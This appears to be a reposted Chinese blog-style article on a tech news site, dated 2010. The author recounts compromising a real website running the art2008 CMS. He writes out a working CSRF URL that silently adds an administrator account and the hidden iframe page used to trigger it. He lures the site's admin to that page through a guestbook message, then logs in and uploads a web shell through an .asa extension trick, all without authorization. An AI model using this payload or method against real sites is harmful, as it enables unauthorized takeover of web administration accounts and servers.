科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道网络安全一次基于CSRF下的攻击实例

一次基于CSRF下的攻击实例

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

 最近想测试一下用CSRF来搞一个站有多快? 于是乎就测试了一下,结果还是挺让人满意的。废话不多说了, 切入正题。 文章没技术含量,望高手别捧腹大笑 - -||

来源:chinaitlab 2010年12月12日

关键字: 黑客 网络安全

  • 评论
  • 分享微博
  • 分享邮件

  最近想测试一下用CSRF来搞一个站有多快? 于是乎就测试了一下,结果还是挺让人满意的。废话不多说了, 切入正题。 文章没技术含量,望高手别捧腹大笑 - -||

  我从源码站里下了一套源码,名曰:art2008 我是从增加管理员这里进行CSRF的, 同过抓包 我发现,构造一个链接如:

  http://www.xxx.com/admin/admin_admin.asp?action=savenew&username=11111&PrUserName=11111&passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA&fullname=%B9%FE%B9%FE&email=xss@qq.com&depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code]

  就能够自动增加一个管理员, 于是乎测试了一下,发现可以增加。然后便开始找对象进行试验..

  google了一下 , 找了个管理员经常上的网站进行了测试, 然后我先是在自己空间上建立了以个test.htm 代码如下:

  [code]你喜欢包拯吗? http://www.xxx(名字略).com/admin/admin_admin.asp?action=savenew&username=111111&PrUserName=111111&passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA&fullname=%B9%FE%B9%FE&email=xss@qq.com&depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100">

  然后找到那个网站的留言板,开始留言,如图:

  

  当管理员访问我的网站时候,他便被CSRF了。。 就在此后, 我便去玩CS了,战绩还不错- - 杀16死5.

  当我回来时候,管理员已经回复了(- - ||真快阿)如图:

  

  管理员应该访问了我的网站,于是我迅雷不及掩耳之势的跑去后台看看有没有成功增加,用户名:111111 密码:123456 结果成功登陆了!! 如图:

  

  后台后个上传,改了一下扩展名asa ,马儿便飞到了服务器上, 如图:

  

  大概计算了一下,一共花费了约30分钟左右的时间。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章